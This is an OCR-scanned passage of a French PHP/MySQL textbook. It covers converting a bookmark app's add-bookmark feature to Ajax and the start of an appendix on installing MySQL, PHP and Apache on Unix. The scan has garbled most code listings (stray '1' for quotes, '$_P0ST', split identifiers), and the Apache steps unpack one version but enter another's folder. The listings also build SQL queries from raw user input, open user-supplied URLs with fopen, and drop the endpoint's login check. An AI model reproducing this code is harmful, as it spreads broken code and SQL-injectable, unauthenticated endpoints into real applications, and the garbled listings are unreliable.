que demander des rechargements de page, le bouton d'envoi appellera en arriere-plan 
une fonction JavaScript qui, elle-meme, invoquera un script PHP pour ajouter l'element 
a la base de donnees et renvoyer la reponse a l'utilisateur, tout cela sans quitter la page 
qui a deja ete chargee. Cette nouvelle fonctionnalite implique d'abord de modifier la 
fonction display add bm f orm( ) de output _fns.php. 

Le Listing 32.5 presente cette fonction modifiee. Nous avons supprime Taction du 
formulaire, ajoute un identifiant id au champ de saisie et modifie les attributs 
du bouton. Nous avons egalement ajoute un appel a la fonction JavaScript getXMLHTTP 
Request(). 

Listing 32.5 : Version modifiee de display_add_bm_form() 

function display_add_bm_f orm( ) { 

// Affiche le formulaire pour ajouter un favori 

?> 

<script type=" text /JavaScript "> 
var myReq = getXMLHTTPRequest ( ) ; 
</script> 
<f orm> 

<table width="250" cellpadding="2" cellspacing="0" bgcolor="#cccccc"> 
<tr><td>New BM:</td> 

<td><input type="text" name="new_url" name="new_url" value=" http : / / " 

size="30" maxlength="255" /></td></tr> 
<tr><td colspan="2" align="center"> 

<input type="button" value="Add bookmark" 

onClick=" JavaScript : addNewBookmark ( ) ; "/></td></tr> 

</table> 
</f orm> 
<?php 
} 
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Examinons de plus pres 1' element du bouton : 

<input type="button" value="Add bookmark" 

onClick=" JavaScript : addNewBookmark( ) ; "/> 

Lorsque Ton cliquera sur ce bouton, le gestionnaire d'evenement onClick appellera 
desormais la fonction JavaScript addNewBookmark(), qui adressera une requete au 
serveur (plus precisement, a un script PHP qui tentera d'ajouter ce favori dans la base 
de donnees). Le code de cette fonction est presente dans le Listing 32.6. 

Listing 32.6 : La fonction JavaScript addNewBookmarkQ 

function addNewBookmark( ) { 

var url = "add_bms.php" ; 

var params = "new_url=" + 
encodeUR I (document . get Element By Id ( ' new_url 1 ) .value) ; 

myReq.open( "POST" , url, true); 

myReq . setRequestHeader( "Content-type" , 

"application/x-www-form-urlencoded" ) ; 

myReq . setRequestHeader( "Content-length" , params. length) ; 

myReq . set Request Header ( "Connection" , "close" ) ; 

myReq. onreadystatechange = addBMResponse; 

myReq. send(params) ; 

} 



Cette fonction ressemble a la fonction getServerTime( )_que nous avons etudiee plus 
haut. Son traitement est quasiment le meme : elle cree des variables, envoie les donnees 
a un script PHP et appelle une fonction pour traiter la reponse du serveur. 

Les lignes suivantes creent une paire nom/valeur a partir du nom du champ du formu- 
laire et de la valeur saisie par l'utilisateur : 

var params = "new_url=" + encodeURI (document .getElementByld 
( 'new_url' ) .value) ; 

La valeur de params est ensuite envoyee au script PHP dans la derniere ligne de la fonction : 
myReq. send(params) ; 

Avant d'envoyer les valeurs, on envoie egalement trois en-tetes de requete pour que le 
serveur sache gerer les donnees de la requete POST : 

myReq. set Request Header( "Content-type" , 

"application/x-www-form-urlencoded" ) ; 
myReq. setRequestHeader( "Content-length" , params. length) ; 
myReq . set Request Header( "Connection" , "close" ) ; 

Letape suivante consiste a creer la fonction JavaScript pour traiter la reponse du 
serveur ; nous l'avons appelee addBMResponse : 

myReq. onreadystatechange = addBMResponse; 
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La encore, son code ressemble a celui de la fonction theHTTPResponse que nous avons 
deja etudiee. II est presente dans le Listing 32.7. 

Listing 32.7 : La fonction JavaScript addBMResponseQ 

function addBMResponse ( ) { 
if (myReq . readyState == 4) { 
if (myReq. status == 200) { 

result = myReq. responseText; 

document . get Element By Id ( ' display result ' ) . innerHTML = 

result; 

} else { 

alert ('There was a problem with the request.'); 

} 

} 

} 



Cette fonction verifie d'abord l'etat de l'objet ; s'il a termine son traitement, elle verifie 
que le code de reponse du serveur etait bien 200 (OK). Dans le cas contraire, elle affiche 
un message d'alerte contenant la phrase "There was a problem with the request". Toutes 
les autres reponses viendront de 1' execution du script addjbms.php et s'afficheront 
dans un element div ayant l'identifiant displayresult. Pour le moment, cet identifiant 
est defmi dans la feuille de style new_ss.css de la facon suivante (fond blanc) : 

#displayresult { 
background: #fff; 

} 

La ligne suivante a ete ajoutee apres la balise fermante du formulaire dans la fonction 
display add bm form() ; il s'agit de l'element div qui affichera le resultat du serveur. 

<div id="displayresult"></div> 

Nous devons ensuite modifier le code du script add_bms.php. 

Modifications du code existant 

Si vous tentiez d'ajouter un favori sans modifier quoi que ce soit au script addjbms.php, 
la verification des droits de l'utilisateur et l'ajout du favori fonctionneraient parfaite- 
ment mais le resultat serait la monstruosite representee a la Figure 32.4, ou le titre, le 
logo et les liens de bas de page sont dupliques, sans compter d' autres problemes d'affi- 
chage. 

Dans la version non Ajax de PHPbookmark, le formulaire est sur une page, le resultat 
est sur une autre et tous les elements des pages sont recharges a chaque fois. Dans un 
environnement Ajax, en revanche, on veut ajouter un favori, obtenir le resultat du 
serveur et continuer a ajouter d' autres favoris (ou pas) sans recharger le moindre 
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element. Cette nouvelle fonctionnalite necessite done de modifier le code initial de 
addjbms.php, qui est presente dans le Listing 32.8. 



Figure 32.4 

Ajout d'un favori 
avant d'avoir modifie 
le script 
add_bms.php. 



, Add Bookmarks - 



File Edit View History Bookmarks Tool; Help 



http:// , localhoit' , phpmy5ql4e/ , chapter34/add_bm_farm.php 



PHPbookmark 



Add Bookmarks 

Logged in as jcrneloni. 
New 
BM: 



http ://www.ya h o o . c o m 



| Add baokmark~ 

PHPbookmark 



Adding bookmarks 

Logged in as jcrneloni. 

Attempting to add http://www.yahoo.com 

Bookmark added. 

Bookmark Delete? 
hue y^hoo lO" H 



Home | Add BM | Delete BM | Change passwwcl 
Recommend URLs to me I Loooot 



Home | Add BM I I Chance password 

Recommend URLs to me I Logout 



Listing 32.8 : Le code PHP initial de add_bms.php 



<?php 

require_once ( ' bookmark_f ns . php ' ) ; 
session_start( ) ; 



// Creation d'une variable au nom court 
$new_url = $_P0ST[ 1 new_url 1 ] ; 



do_html_header( 'Adding bookmarks ' ) ; 



try { 

check_valid_user( ) ; 
if ( !filled_out($_POST) ) { 
throw new Exception ( 1 Form not completely filled out.'); 

} 

// Verifie le format de l'URL 
if (strstr($new_url, 'http://') === false) { 
$new_url = ' http : / / ' . $new_url; 

} 
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// Verifie que l'URL est valide 
if ( ! (@fopen($new_url, 'r'))) { 

throw new Exception ( 1 Not a valid URL. 1 ); 

} 

// Tente d'ajouter un favori 

add_bm($new_url) ; 

echo 'Bookmark added. 1 ; 

// Recupere les favoris sauvegardes par 1 1 utilisateur 
if ($url_array = get_user_urls ($_SESSION[ 1 valid_user 1 ] ) ) { 
display_user_urls($url_array) ; 

} 

} 

catch (Exception $e) { 
echo $e->getMessage( ) ; 

} 

display_user_menu ( ) ; 
do_html_f ooter( ) ; 

?> 



La premiere ligne du script integre tous les elements de bookmark_fns.php. Si vous 
examinez son contenu, vous remarquerez qu'il appelle lui-meme toute une serie 
d'autres fichiers : 

<?php 

// Nous pouvons inclure ce fichier dans tous nos fichiers afin 

// qu'ils contiennent toutes les fonctions et exceptions. 

require_once ( ' data_valid_f ns . php 1 ) ; 

require_once( 'db_fns.php' ) ; 

require_once( ' user_auth_f ns . php 1 ) ; 

require_once( ' output_f ns . php 1 ) ; 

require_once( ' url_f ns . php 1 ) ; 

?> 

Bien que vous n' ayez peut-etre pas besoin de tous les elements de ces fichiers dans la 
version Ajax de l'ajout de favoris, le commentaire place au debut de ce fichier est reve- 
lateur : afin qu'ils contiennent toutes les fonctions et exceptions. Dans cette situation, 
lorsque Ton passe d'une suite de pages dynamiques a la fonctionnalite "tout en un" 
fournie par Ajax, il est preferable d'avoir quelques elements en trop, plutot que suppri- 
mer des elements essentiels tant que Ton n'est pas sur de ne plus en avoir besoin. C'est 
la raison pour laquelle il faut conserver cette premiere ligne. 

La seconde ligne, qui commence ou continue une session utilisateur, doit egalement 
etre conservee ; il faut maintenir cette securite, meme dans la version Ajax de cette 
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action. II en va de meme pour la troisieme ligne, qui stocke la valeur POST recue par le 
script dans la variable $new url : 

$new_url = $_P0ST[ 1 new_url ' ] ; 

Enfin, nous arrivons au point ou Ton peut supprimer des choses, notamment la ligne : 

do_html_header( 'Adding bookmarks' ) ; 

Comme nous sommes deja sur une page {add_bm_form.php) contenant des titres, il 
n'est pas necessaire de les repeter. C'est cette repetition qui produit les deux ensembles 
de titres et de logos de la Figure 32.4. Pour les memes raisons, vous pouvez eliminer 
egalement les deux lignes finales de addjbms.php : 

display_user_menu ( ) ; 
do_html_f ooter( ) ; 

Si Ton supprime ces elements, qu'on depose le nouveau fichier sur le serveur et que 
Ton tente d'ajouter un nouveau favori, le resultat sera plus proche de celui que Ton 
attend, bien qu'il y ait encore quelques modifications a faire. La Figure 32.5 montre ce 
qu'affichera 1' application a ce stade. 



Figure 32.5 

Ajout d'un favori 
apres la premiere 
passe de modifica- 
tion du script 
add_bms.php. 
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Bookmark 


Delete? 
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Home | Add BM | | Change password 

Recommend URLs to me | Logout 



Nous avons encore un message duplique concernant le statut "connecte" de l'utilisateur, 
mais ce probleme n'est pas aussi criant qu'auparavant. L' drape suivante consiste a 
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supprimer ces messages dupliques et a modifier certaines fonctionnalites liees aux 
exceptions pour qu'elles soient adaptees a un environnement Ajax. 

Pour supprimer le message duplique concernant le nom de connexion de l'utilisateur, il 
suffit de supprimer cette ligne de addjbms.php : 

check_valid_user( ) ; 

En effet, on a deja teste que l'utilisateur etait valide au moment du chargement de la 
page add_bms_form.php : nous ne serions pas sur la page qui demande la fonctionnalite 
Ajax si nous n'etions pas un utilisateur valide. 

L'etape suivante consiste a supprimer le bloc try externe et le traitement d'exception 
car on veut que le script aille jusqu'a la fin, ou il affiche la liste des URL deja stockees. 
Ceci signifie qu'il faudra faire quelques ajustements dans le code pour produire des 
messages d'erreurs lorsqu'ils sont necessaries. La version modifiee de addjbms.php est 
presentee dans le Listing 32.9. 

Listing 32.9 : Version modifiee de add_bms.php 



<?php 

require_once( ' bookmark_f ns . php ' ) ; 
session_start( ) ; 

// Creation d'une variable au nom court 
$new_url = $_P0ST[ 1 new_url 1 ] ; 

// Verifie que le formulaire a ete rempli 
if ( !filled_out($_POST) ) { 
// II ne l'a pas ete 

echo "<p class=\ "warn\ ">Form not completely filled out.</p>"; 
} else { 

// II est complet ; verifie et corrige l'URL si necessaire. 
if (strstr($new_url, ' http : / / 1 ) === false) { 
$new_url = ' http: / / ' . $new_url; 

} 

// Verifie que l'URL est valide 
if ( ! (@fopen($new_url, 'r'))) { 

echo "<p class=\ "warn\ ">Not a valid URL.</p>"; 
} else { 

// Elle est valide, done on l'ajoute 

add_bm($new_url) ; 

echo "<p>Bookmark added. </p>"; 

} 

} 

// Quel que soit l'etat de la requete courant, on recupere les 
// favoris deja stockes par cet utilisateur. 
if ($url_array = get_user_urls ($_SESSI0N [ 1 valid_user 1 ] ) ) { 
display_user_urls($url_array) ; 

} 
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Cette version suit toujours une demarche logique entre les differents evenements possi- 
bles mais affiche un message d'erreur approprie sans dupliquer les autres elements de la 
page. 

Le premier test consiste a verifier que le formulaire a ete bien rempli. Dans le cas 
contraire, on affiche un message d'erreur entre le formulaire d'ajout et la liste des favoris 
actuels de l'utilisateur, comme le montre la Figure 32.6. 



Figure 32.6 

Tentative d'ajouter 
une valeur vide. 
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Le second test verifie que l'URL est bien formee ; dans le cas contraire, la chaine est 
transformee en une URL correcte et on passe a l'etape suivante, qui consiste a ouvrir 
une socket et a tester la validite de l'URL. Si ce test echoue, on affiche un message 
d'erreur entre le formulaire d'ajout et la liste des favoris actuels de l'utilisateur. Si 
l'URL est valide, elle est ajoutee a la liste des favoris. La Figure 32.7 montre ce qui se 
passe lorsque Ton tente d'ajouter une URL invalide. 

Enfin, quelles que soient les erreurs lors des tentatives d'ajouts des URL, on affiche les 
favoris actuels de l'utilisateur, comme le montre la Figure 32.8. 

Bien que Ton ait reussi a integrer Ajax a l'ajout des favoris, il reste encore quelques 
elements a modifier. La fonction add bm ( ) du fichier url_fns.php, par exemple, contient 
quelques exceptions qui pourraient etre gerees differemment pour produire un message 
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d'erreur dans le nouveau systeme. Le Listing 32.10 presente le code de la fonction 
add bm( ) existante. 



Figure 32.8 
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Figure 32.7 

Tentative d'ajouter 
une URL invalide. 
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Listing 32.10 : La fonction add_bm() de url_fns.php 



function add_bm($new_url) { 

// Ajoute un nouveau favori a la base de donnees 



echo "Attempting to add " .htmlspecialchars($new_url) . "<br />"; 
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$valid_user = $_SESSI0N[ 1 valid_user 1 ] ; 
$conn = db_connect( ) ; 

// Verifie que le favori n'existe pas deja 
$result = $conn->query( "select * from bookmark 

where username= ' $valid_user 1 
and bm_URL=' " .$new_url. ); 
if ($result && ($result->num_rows>0) ) { 

throw new Exception (' Bookmark already exists.'); 

} 

// Insere le nouveau favori 

if ( !$conn->query( "insert into bookmark values 
( 1 " .$valid_user. " ' , 1 " .$new_url. " ' ) " ) ) { 
throw new Exception (' Bookmark could not be inserted.'); 

} 

return true; 

} 



Ici, nous voulons modifier les exceptions pour qu'elles produisent des messages 
d'erreur et qu'elles continuent le traitement (c'est-a-dire l'affichage). Pour ce faire, on 
peut modifier les deux blocs if de la facon suivante : 

if ($result && ($result->num_rows>0) ) { 

echo "<p class=\ "warn\ ">Bookmark already exists . </p>" ; 
} else { 

// Tentative d'ajout 

if ( !$conn->query( "insert into bookmark values 
( '" .$valid_user. " 1 , 111 .$new_url. "' ) " ) ) { 

echo "<p class=\ "warn\ ">Bookmark could not be inserted. </p>" ; 
} else { 
echo "<p>Bookmark added. </p>"; 

} 

} 

Cette version du script suit toujours une demarche logique entre les differents evene- 
ments possibles et affiche les messages d'erreur appropries. Apres avoir verifie si le 
favori existe deja, soit on affiche un message d'erreur entre le formulaire d'ajout et la 
liste des favoris actuels de l'utilisateur, soit on tente d'ajouter le favori. 

Si le favori ne peut pas etre ajoute, on affiche une fois de plus un message d'erreur entre 
le formulaire d'ajout et la liste des favoris actuels de l'utilisateur. Si, en revanche, il a pu 
etre ajoute, on affiche le message "Bookmark added". Cette instruction d'affichage a ete 
supprimee du script addjbm.php et placee a cet endroit dans la fonction add bm( ) car 
sinon l'utilisateur pourrait voir un message "Bookmark could not be inserted" suivi de 
"Bookmark added" alors que l'insertion n'a pas reussi. 
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La Figure 32.9 montre le resultat de ces modifications. 



Figure 32.9 
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Autres modifications apportees a PHPbookmark 

La modification de l'ajout des favoris pour y integrer Ajax n'est que la premiere des 
nombreuses modifications que vous pouvez apporter a cette application. Le prochain 
candidat logique serait la suppression d'un favori ; ce traitement pourrait alors se resumer 
aux etapes suivantes : 

■ Supprimer le lien Delete BM du pied de page. 

■ Appeler une nouvelle fonction JavaScript lorsque l'utilisateur coche la case Delete? 
situee a cote d'un favori. 

£8 Modifier le script delete jbm.php pour qu'il puisse etre appele par cette fonction 
JavaScript, afin qu'il termine la suppression et renvoie un message a l'utilisateur. 

■ Apporter toutes les modifications necessaires pour s' assurer que les actions auront 
lieu et que les messages s'afficheront correctement dans cette nouvelle interface. 

Avec la structure que nous avons deja mise en place, les informations fournies dans ce 
chapitre devraient vous suffire pour effectuer ces modifications. Cependant, les sections 
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qui suivent indiquent des liens vers des ressources contenant beaucoup plus d'informa- 
tions sur la creation de sites avec Ajax. 

N'oubliez pas qu'Ajax regroupe un ensemble de technologies qui, ensemble, permet- 
tent de creer des interfaces utilisateurs plus fluides. Vous pouvez desormais penser vos 
applications pour qu'elles integrent des le depart ces fonctionnalites, maintenant que 
vous savez comment placer les differentes pieces du puzzle. 

Pour aller plus loin 

Les informations fournies dans ce chapitre n'ont fait qu'effleurer la surface de la crea- 
tion des applications Ajax. Un livre recent, Sams Teach Yourself Ajax, JavaScript, and 
PHP All in One, explique tout cela de facon bien plus detaillee et constitue done la suite 
logique de ce chapitre. De nombreux sites web sont egalement consacres aux differents 
composants qui constituent les applications Ajax et il existe des bibliotheques tierces 
qui vous permettront d'integrer Ajax dans vos applications sans devoir reinventer la 
roue. 

En savoir plus sur le DOM (Document Object Model) 

Ce livre traite de la programmation cote serveur avec PHP et de 1' utilisation de MySQL 
comme SGBDR, mais il ne dit rien de tout ce qui est lie a la programmation cote client, 
comme XHTML, CSS, JavaScript et le DOM, le Document Object Model. Si vous ne 
connaissez pas ce dernier, e'est le principal sujet que vous devriez approfondir car il 
vous permettra de progresser dans la creation d' applications totalement orientees Ajax. 

Quasiment toutes les applications Ajax utilisent JavaScript pour manipuler le DOM. 
Que vous manipuliez des elements affichables, l'historique du navigateur ou les empla- 
cements des fenetres, une connaissance approfondie des objets et des proprietes dispo- 
nibles via le DOM est essentielle pour produire des applications Ajax. 

Les sites suivants contiennent une foule d' informations interessantes sur le DOM : 

■ Le rapport technique du W3C sur le Document Object Model est disponible a l'URL 
http://www.w3.org/DOM/DOMTR. 

La page d'accueil de la DOM Scripting Task Force est http://domscripting.web- 
standards.org/. 

a Les documents developpeur du projet Mozilla consacres a DOM sont disponibles a 
partir de http://developer.mozilIa.org/en/docs/DOM (on trouve egalement des 
informations interessantes sur les documents JavaScript a partir de la page http:// 
developer.mozilla.org/en/docs/JavaScript). 
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Bibliotheques JavaScript pour les applications Ajax 

Les applications Ajax existent depuis 2005, lorsque Jesse James Garrett a ecrit un arti- 
cle dans lequel il introduisait le terme Ajax parce qu'il "avait besoin de quelque chose 
de plus court que 'Asynchronous JavaScript + CSS + DOM + XMLHttpRequest' pour 
decrire cette approche". II s'est done ecoule suffisamment de temps depuis pour que 
des bibliotheques de fonctions JavaScript voient le jour afin d' aider les developpeurs a 
creer leurs applications Ajax. 



Info 



L'article de Garrett, "Ajax: A New Approach to Web Applications", est disponible sur la page 
http://www.adaptivepath.com/ideas/essays/archives/000385.php. 



Nous donnons ici la liste de quelques bibliotheques connues, bien que visiter n'importe 
quel site consacre au developpement Ajax vous en fournisse bien plus. Utiliser l'une 
(ou plusieurs) de ces bibliotheques vous fera gagner du temps car, comme nous l'avons 
deja dit, vous n'aurez pas a reinventer la roue. 

Le Prototype JavaScript Framework simphne la manipulation du DOM et l'utilisation 
de l'objet XMLHTTPRequest lorsque vous developpez des applications Ajax complexes. 
Pour plus d' informations, consultez la page http://www.prototypejs.org/. 

■ Do jo est une boite a outils open- source comprenant des fonctions JavaScript de 
base, un framework de creation de widget et un mecanisme pour faciliter l'empa- 
quetage et la distribution du code a l'utilisateur final. Pour plus d' informations, 
consultez la page http://dojotoolkit.org/. 

■ MochiKit est une bibliotheque legere comprenant des fonctions permettant de mani- 
puler le DOM et de formater l'affichage. Le but de MochiKit est un peu cm, mais a 
le merite d'etre honnete : "Avec MochiKit, JavaScript est moins chiant." Les fonc- 
tions et les solutions de MochiKit, la documentation pour les developpeurs et les 
exemples de projets crees avec cette bibliotheque meritent d'etre etudies. Pour plus 
d' informations, consultez la page http://mochikit.com/. 

Sites consacres au developpement Ajax 

Enfm, le meilleur moyen d'apprendre a developper avec Ajax consiste a pratiquer. 
Recuperez des extraits de code, essay ez d'en integrer des morceaux dans vos appli- 
cations existantes et tirez parti de l'experience de ceux qui travaillent avec ces techno- 
logies depuis quelque temps. Voici quelques adresses qui vous aideront a debuter : 

■ Ajaxian (http://ajaxian.com/) est un portail ou vous trouverez des actualites, des 
articles, des didacticiels et des exemples de code pour les developpeurs debutants et 
experimentes. 



884 Partie V Creer des projets avec PHP et MySQL 



■ Ajax Matters (http://www.ajaxmatters.com/) contient des articles de fond sur le 
developpement avec Ajax. 

■ Ajax Lines (http://www.ajaxlines.com/) est un autre portail pour developpeurs, 
avec des liens vers des actualites et des articles sur tout ce qui touche a Ajax. 
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Installation de PHP et de MySQL 



Apache, PHP et MySQL sont disponibles pour un grand nombre de combinaisons de 
systemes d' exploitation et de serveurs web. Dans cette annexe, nous n'expliquerons 
comment configurer Apache, PHP et MySQL que pour les deux plates-formes les plus 
connues, Unix et Windows Vista, et nous decrirons les options les plus frequemment 
employees sur ces deux systemes. 

— Info 

Cette annexe n'explique pas comment ajouter PHP a Microsoft Internet Information Server 
ou a d'autres serveurs web car nous conseillons d'utiliser le serveur Apache a chaque fois 
que cela est possible. Vous trouverez des informations sur I'installation de PHP avec Micro- 
soft IIS ou Personal Web Server (PWS) dans le manuel en ligne PHP, sur la page http:// 
www.php.net/manual/en/install.windows.iis.php. 



Cette annexe a pour but de fournir un guide d' installation d'un serveur web destine a 
heberger plusieurs sites. Certains sites de commerce electronique, comme certains de 
ceux pris en exemple dans cet ouvrage, necessitent SSL (Secure Socket Layer) pour 
les solutions d'e-commerce, et la plupart des sites web utilisent des scripts pour se 
connecter a un serveur de base de donnees, ann d'en extraire des donnees et les 
traiter. 

De nombreux utilisateurs de PHP n'ont jamais besoin d'installer PHP sur leur ordina- 
teur personnel. C'est la raison pour laquelle ces informations sont rassemblees dans une 
annexe plutot que dans le Chapitre 1 . Le meilleur moyen de disposer d' un serveur fiable 
avec une connexion rapide a Internet et PHP deja installe consiste a souscrire un 
compte aupres de l'un des milliers de services d'hebergement dissembles dans le 
monde. 
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L' usage que vous ferez de PHP influera certainement sur votre decision. Si vous 
disposez d'un ordinateur connecte en permanence au reseau et que vous projetiez de 
l'utiliser comme serveur, la qualite des connexions peut avoir de 1' importance pour 
vous. Si vous configurez un serveur de developpement afin de developper et de tester 
votre code, le fait d' avoir une configuration identique au serveur sur lequel vous 
projetez d'installer votre application sera la consideration la plus importante. Si 
vous avez le projet d'executer ASP et PHP sur le meme ordinateur, d'autres restrictions 
s'appliqueront. 



— Info 

L'interpreteur PHP peut etre execute en tant que module ou en tant que binaire CGI 
(Common Gateway Interface) distinct. Generalement, on emploie la version module pour 
des raisons de performances, mais on recourt parfois a la version CGI pour des serveurs pour 
lesquels il n'existe pas de module PHP ou parce que cela permet d'executer differentes pages 
PHP sous differents ID d'utilisateur. 

Dans cette annexe, nous privilegierons la version module comme methode d'execution de 
PHP. 



Installation d'Apache, PHP et MySQL sous Unix 

En fonction de vos besoins et de votre experience avec les systemes Unix, vous choisi- 
rez une installation avec des binaires ou la compilation des programmes directement a 
partir de leur source. Ces deux approches ont des avantages et des inconvenients. 

Un expert realisera une installation binaire en quelques minutes et cela ne demandera 
pas beaucoup plus de temps a un debutant. L' inconvenient est que le systeme installe 
datera deja de quelques versions par rapport aux versions actuelles des programmes. 
En outre, le systeme sera configure en fonction de decisions prises par une autre 
personne. 

Une installation avec les sources demande quelques heures pour le telechargement, 
l'installation et la configuration, et elle est intimidante les premieres fois. Elle procure 
toutefois un controle complet car on peut choisir ce que Ton veut installer, les versions 
utilisees et les directives de configuration. 

Installation a partir de binaires 

La plupart des distributions Linux comprennent un serveur web Apache preconfigure 
qui integre PHP. Les caracteristiques internes de ces installations dependent de la distri- 
bution choisie et de sa version. 

Un inconvenient des installations avec des binaires tient au fait qu'on obtient rarement 
la derniere version du programme installe. Selon l'importance des dernieres corrections 
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de bogues, le fait d'utiliser une version plus ancienne peut ne pas etre genant, mais le 
probleme principal tient a ce que vous ne pouvez pas choisir les options qui sont compilers 
dans vos programmes. 

La methode la plus souple et la plus fiable implique la compilation de tous les program- 
mes dont vous avez besoin a partir de leurs sources. Cette operation demandant un peu 
plus de temps qu'une installation a partir de RPM, vous prefererez peut-etre malgre tout 
installer a partir de RPM ou d'un autre systeme de paquetages binaires lorsque ceux-ci 
sont disponibles. Meme si les fichiers binaires avec la configuration dont vous avez 
besoin ne sont pas disponibles aupres des sources officielles, vous en trouverez de non 
officielles a l'aide d'un moteur de recherche. 

Installation a partir des sources 

Installons Apache, PHP et MySQL dans un environnement Unix. Tout d'abord, nous 
devons decider des modules supplementaires que nous ajouterons a ce trio. Compte 
tenu du fait que certains exemples de cet ouvrage requierent l'utilisation d'un serveur 
securise pour les transactions web, nous installerons ici un serveur prenant en charge 
SSL (Secure Socket Layer). 

Notre installation PHP ressemblera plus ou moins a celle par defaut, sauf que nous acti- 
verons egalement la bibliotheque GD2, qui n'est qu'un exemple des nombreuses biblio- 
theques disponibles pour PHP. Nous 1' installerons ici afm de vous montrer les 
operations impliquees par 1' installation de bibliotheques supplementaires dans PHP. 
La compilation de la majorite des programmes Unix suit la meme procedure. 

Generalement, il faut recompiler PHP apres l'installation d'une nouvelle bibliotheque ; 
si vous savez a 1' avance ce dont vous avez besoin, vous avez done tout interet a installer 
les bibliotheques exigees avant de compiler le module PHP. 

Ici, nous effectuerons notre installation sur un serveur SuSE Linux, mais notre description 
restera suffisamment generique pour s'appliquer aux autres serveurs Unix. 

Commencons par enumerer les outils necessaries au processus d' installation : 

■ Apache (http://www.apache.org/), le serveur web ; 

■ OpenSSL (http://www.openssI.org/), le paquetage open-source qui implemente 

SSL (Secure Socket Layer) ; 

■ MySQL (http://www.mysql.com/), la base de donnees relationnelle ; 

■ PHP (http://www.php.net/), le langage de script cote serveur ; 

O JPEG (ftp://ftp.uu.net/graphics/jpeg/), la bibliotheque JPEG, requise par PDFlib 
et GD ; 
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■ PNG (http://www.libpng.org/pub/png/libpng.html), la bibliotheque PNG, requise 
par GD ; 

■ Zlib (http://www.gzip.org/zlib/), la bibliotheque zlib, requise par la bibliotheque 
PNG (voir ci-dessus) ; 

■ TIFF (http://www.libtiff.org/), la bibliotheque TIFF, requise par PDFlib ; 

■ IMAP (ftp://ftp.cac.washington.edu/imap/), le client IMAP, requis par IMAP 

Si vous voulez utiliser la fonction mail ( ) , vous devez installer un MTA (Mail Transfer 
Agent) mais nous ne presenterons pas cette installation ici. 

Nous supposerons que vous avez un acces root au serveur et que vous disposez des 
outils suivants : 

I gzip ou gunzip ; 

■ gcc et GNU make. 

Lorsque vous etes pret a entreprendre le processus d'installation, il est preferable de 
commencer par telecharger toutes les sources (sous forme de fichiers tar) dans un 
repertoire temporaire. Assurez-vous de les enregistrer a un emplacement ou vous dispo- 
serez de suffisamment d'espace disque. Dans notre cas, nous avons choisi /usr/src 
comme repertoire temporaire. Pour eviter tout probleme au niveau des permissions, il 
est preferable de les telecharger avec le compte de l'utilisateur root. 

Installation de MySQL 

Dans cette section, nous allons decrire une installation de MySQL realisee a partir d'un 
binaire. Celle-ci placera automatiquement tous les fichiers a differents emplacements. 
Les repertoires que nous avons choisis pour les deux autres programmes de notre trio 
sont les suivants : 

■ /usr/local/apache2 ; 

■ /usr/local/ssl. 

Vous pouvez, bien sur, choisir des repertoires differents : il suffit pour cela d'utiliser 
l'option prefix avant 1' installation. 

Allons-y ! Passez sous le compte root avec su : 
$ su root 

et entrez le mot de passe de l'utilisateur root. Placez-vous dans le repertoire courant, 
celui dans lequel vous avez stocke les fichiers sources : 

# cd /usr/src 

MySQL conseille de telecharger un binaire de MySQL plutot que compiler cette appli- 
cation a partir de ses sources. La version a utiliser dependra de ce que vous souhaitez 
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realiser. Bien que les versions en phase de test de MySQL soient generalement tres 
stables, il peut etre preferable de ne pas les utiliser sur un site de production. Si vous ne 
faites que vous entramer sur votre propre ordinateur, vous pouvez choisir d'utiliser 
l'une de ces versions. 

Vous devez telecharger les paquetages suivants : 

MySQL-server-VEflSIOW. i386 . rpm 
MySQL- Max- VERSION. i386 . rpm 
MySQL-client-i/EflSIOW. i386 . rpm 

VERSION est un terme de remplacement pour le numero de version. Quelle que soit la 
version que vous choisirez, assurez-vous de telecharger un ensemble coherent. Si vous 
projetez d'executer le client et le serveur MySQL sur votre ordinateur et que vous 
souhaitiez compiler la prise en charge de MySQL dans d'autres programmes tels que 
PHP, vous aurez besoin de tous ces paquetages. 

Entrez les commandes suivantes pour installer les serveurs et client MySQL : 

rpm -i MySQL-server-VEflSIOW. i386. rpm 
rpm -i MySQL-Max-VERSI0W.i386.rpm 
rpm -I MySQL-client-VEflSI0W.i386.rpm 

Le serveur MySQL doit a present etre operationnel. 

II est desormais temps d'attribuer un mot de passe a l'utilisateur root de MySQL. Dans 
la commande qui suit, assurez-vous de remplacer nouveau mdp par le mot de passe de 
votre choix ; sinon le mot de passe root sera nouveau_mdp : 

mysqladmin -u root password ' nouveau_mdp' 

L installation de MySQL cree automatiquement deux bases de donnees. La premiere 
est la base de donnees mysql, qui controle les utilisateurs, les hotes et les permissions 
sur les bases de donnees du serveur. La seconde est une base de donnees de test. Vous 
pouvez done tester le SGBDR via la ligne de commande, de la maniere suivante : 

# mysql -u root -p 
Enter password : 
mysql> show databases; 
+ + 

| Database | 
+ + 

1 mysql | 
| test | 

+ + 

2 rows in set (0.00 sec) 

Entrez quit ou \q pour quitter le client MySQL. 

La configuration par defaut de MySQL permet a n'importe quel utilisateur d'acceder au 
systeme sans avoir a fournir un nom d'utilisateur ou un mot de passe, ce qui est, 
evidemment, peu souhaitable. 
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La derniere operation de l'installation de MySQL consiste done a faire un peu de menage 
en supprimant cet utilisateur anonyme. Pour cela, ouvrez une ligne de commande et tapez 
les lignes suivantes : 

# mysql -u root -p 
mysql> use mysql 

mysql> delete from user where User=''; 
mysql> quit 

Puis : 

mysqladmin -u root -p reload 
pour que ces modifications soient prises en compte par le serveur. 

Vous devez egalement activer la journalisation binaire sur le serveur MySQL, car vous 
en aurez besoin si vous prevoyez d'utiliser la replication. Pour cela, arretez d'abord le 
serveur : 

mysqladmin -u root -p shutdown 

Puis creez un fichier appele /etc/my.cnf qui servira a stacker les options de MySQL. 
Pour le moment, vous n'en avez besoin que d'une seule, mais vous pouvez en definir 
plusieurs a cet endroit. Consultez le manuel MySQL pour en connaitre la liste 
complete. 

Ouvrez le fichier et tapez : 

[mysqld] 
log-bin 

Enregistrez le fichier et quittez le programme. Ensuite, redemarrez le serveur en lancant 
la commande mysqld safe. 

Installation de PHP 

Passons maintenant a l'installation de PHP. Vous devez toujours agir en tant que root. 

L'installation de PHP requiert qu' Apache soit preconfigure pour que PHP puisse loca- 
liser ce qui lui est necessaire. Nous reviendrons sur ce point un peu plus loin dans cette 
section lorsque nous configurerons le serveur Apache. Revenez au dossier dans lequel 
sont stockees les sources : 

# cd /usr/src 

# gunzip -c httpd-2.2.9.tar.gz | tar xvf - 

# cd apache_1 .3.31 

# ./configure --pref ix=/usr/local/apache2 

